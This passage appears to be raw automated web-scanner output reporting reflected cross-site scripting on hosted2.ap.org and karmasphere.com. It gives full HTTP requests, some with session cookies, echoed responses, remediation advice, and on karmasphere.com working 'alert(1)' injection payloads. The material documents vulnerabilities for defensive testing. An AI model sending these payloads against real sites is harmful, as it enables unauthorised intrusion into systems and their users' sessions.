<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940924fcab';4f3ddbec193/id-213e6b7bd15d4ef5bc30feb6708734d8'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 356cd'%3b1a8499b573d was submitted in the REST URL parameter 2. This input was echoed as 356cd';1a8499b573d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092356cd'%3b1a8499b573d/Article_2011-01-30-Sundance%20Awards/id-277f03ce0f9c459abba5c03f3c938e1c HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Sun, 30 Jan 2011 18:32:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 64312
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092356cd';1a8499b573d/id-277f03ce0f9c459abba5c03f3c938e1c'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e705'%3b67f6518824b was submitted in the REST URL parameter 2. This input was echoed as 3e705';67f6518824b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940923e705'%3b67f6518824b/Article_2011-01-30-Sundance%20Robert%20Redford/id-32ad9c0214b247758471c69154543756 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86374 Date: Mon, 31 Jan 2011 02:59:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 58151
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940923e705';67f6518824b/id-32ad9c0214b247758471c69154543756'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7de0'%3bdbf51417c7b was submitted in the REST URL parameter 2. This input was echoed as e7de0';dbf51417c7b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092e7de0'%3bdbf51417c7b/Article_2011-01-30-Sundance%20Robert%20Redford/id-85e83382aba74ebeb786ba994d03a505 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Mon, 31 Jan 2011 00:55:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 58138
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092e7de0';dbf51417c7b/id-85e83382aba74ebeb786ba994d03a505'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3efb5'%3b433c442cfeb was submitted in the REST URL parameter 2. This input was echoed as 3efb5';433c442cfeb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940923efb5'%3b433c442cfeb/Article_2011-01-31-Atlantic%20City%20Roaring%20/'20s/id-e2c33e414a2e4d909836ea680862ae04 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86371 Date: Tue, 01 Feb 2011 02:41:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 72158
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940923efb5';433c442cfeb/id-e2c33e414a2e4d909836ea680862ae04'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b965'%3b0783883b990 was submitted in the REST URL parameter 2. This input was echoed as 6b965';0783883b990 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940926b965'%3b0783883b990/Article_2011-01-31-Awards%20Party/id-092bb74a546f472faf6eddfcb146ea40 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86381 Date: Tue, 01 Feb 2011 02:41:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 61394
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940926b965';0783883b990/id-092bb74a546f472faf6eddfcb146ea40'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41a60'%3bd0bf655646 was submitted in the REST URL parameter 2. This input was echoed as 41a60';d0bf655646 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409241a60'%3bd0bf655646/Article_2011-01-31-Awards/id-86eb654ac57948919c1ac301e645ef65 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86341 Date: Tue, 01 Feb 2011 02:41:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 72081
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409241a60';d0bf655646/id-86eb654ac57948919c1ac301e645ef65'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d716'%3b4212e4d3a53 was submitted in the REST URL parameter 2. This input was echoed as 3d716';4212e4d3a53 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940923d716'%3b4212e4d3a53/Article_2011-01-31-Indonesia%20Sex%20Video%20Trial/id-2ea81b40b1f943009a88bb75d1b8013a HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86365 Date: Tue, 01 Feb 2011 02:40:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 67448
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940923d716';4212e4d3a53/id-2ea81b40b1f943009a88bb75d1b8013a'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 383c4'%3b76aa8c010 was submitted in the REST URL parameter 2. This input was echoed as 383c4';76aa8c010 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092383c4'%3b76aa8c010/Article_2011-01-31-Indonesia%20Sex%20Video%20Trial/id-2ed743e340bd4886ac0759fd4711fee7 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Tue, 01 Feb 2011 02:41:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 70273
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092383c4';76aa8c010/id-2ed743e340bd4886ac0759fd4711fee7'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e7b2'%3bcce1fb12b12 was submitted in the REST URL parameter 2. This input was echoed as 5e7b2';cce1fb12b12 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940925e7b2'%3bcce1fb12b12/Article_2011-01-31-Indonesia%20Sex%20Video%20Trial/id-2ef74d89f2ab4e9f9f44060a7347af13 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Tue, 01 Feb 2011 02:40:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 64343
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940925e7b2';cce1fb12b12/id-2ef74d89f2ab4e9f9f44060a7347af13'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee731'%3b9fe2a726c83 was submitted in the REST URL parameter 2. This input was echoed as ee731';9fe2a726c83 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b21416094092ee731'%3b9fe2a726c83/Article_2011-01-31-Indonesia%20Sex%20Video%20Trial/id-4bf93acb64bc4a8c88199515dc8e27ee HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86400 Date: Tue, 01 Feb 2011 02:40:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 69709
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b21416094092ee731';9fe2a726c83/id-4bf93acb64bc4a8c88199515dc8e27ee'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ad52'%3bfa8e94df901 was submitted in the REST URL parameter 2. This input was echoed as 3ad52';fa8e94df901 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b214160940923ad52'%3bfa8e94df901/Article_2011-01-31-New%20Zealand%20People%20Peter%20Jackson/id-ba1059136a1f4718af76e79fa4da327a HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86362 Date: Tue, 01 Feb 2011 02:41:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 57058
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b214160940923ad52';fa8e94df901/id-ba1059136a1f4718af76e79fa4da327a'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68f98'%3b8e600690d63 was submitted in the REST URL parameter 2. This input was echoed as 68f98';8e600690d63 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409268f98'%3b8e600690d63/Article_2011-01-31-Obit%20John%20Barry/id-983e99213b134bf89a5a99fbdab49883 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86380 Date: Tue, 01 Feb 2011 02:41:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55274
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409268f98';8e600690d63/id-983e99213b134bf89a5a99fbdab49883'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47b9f'%3bdca03a1034b was submitted in the REST URL parameter 2. This input was echoed as 47b9f';dca03a1034b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CTMID/a6ce7ad62f4a4c5c8250b2141609409247b9f'%3bdca03a1034b/Article_2011-01-31-Obit%20John%20Barry/id-e3f424e196884e6c830498b8f66bd938 HTTP/1.1 Host: hosted2.ap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Cache-Control: private, max-age=86378 Date: Tue, 01 Feb 2011 02:41:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 61845
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<link href="http://hosted2-static.ap.org/css/ComponentTypes/StoryPhoto.cs ...[SNIP]... ID/'; switch (n) { case 1: requestURL += 'd57851005a80479aaeeb90a12c70b943/uid-ap_tab1/djs-tabRenderDone/hdr-false/profile-true/parentlayoutname-a6ce7ad62f4a4c5c8250b2141609409247b9f';dca03a1034b/id-e3f424e196884e6c830498b8f66bd938'; break; case 2: requestURL += '135655ca856f4f79aad6f37c1a202843/uid-ap_tab2/djs-tabRenderDone/hdr-false/profile-true/parentlayoutna ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b56cb'%3balert(1)//aa2963cc597 was submitted in the REST URL parameter 1. This input was echoed as b56cb';alert(1)//aa2963cc597 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /In-The-Newsb56cb'%3balert(1)//aa2963cc597/hadoop-basics-and-development-with-karmasphere.html HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:02:21 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:02:21 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34824
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <= solution) { var url='http://karmasphere.com/components/com_stalytics2/trackHeat.php'; var data = 'url=http://karmasphere.com/In-The-Newsb56cb';alert(1)//aa2963cc597/hadoop-basics-and-development-with-karmasphere.html&title=__404__&x='+clickX+'&y='+clickY+'&solution='+solution+'&itemid='+itemid; hm_sendClickAjaxReq(url, data); } // true zurckgeben, d ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 474d7'%3balert(1)//5a22ddb751a was submitted in the REST URL parameter 2. This input was echoed as 474d7';alert(1)//5a22ddb751a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /In-The-News/474d7'%3balert(1)//5a22ddb751a HTTP/1.1 Host: karmasphere.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 9a99d17bd50953aeb8a9e7667440422a=f89b9d074c6917940e1ca4ab49878bf2; __utmz=213720718.1296478383.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; wp=BYBDDDDDDTTHTCX; __utma=213720718.1463850642.1296478383.1296478383.1296478383.1; _mkto_trk=id:294-XKZ-927&token:_mch-karmasphere.com-1296478390295-69233; _jsuid=236660194602537908; __utmc=213720718; __utmb=213720718.6.10.1296478383;
Response
HTTP/1.1 404 NOT FOUND Date: Tue, 01 Feb 2011 03:03:16 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.15 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Tue, 01 Feb 2011 03:03:17 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34722
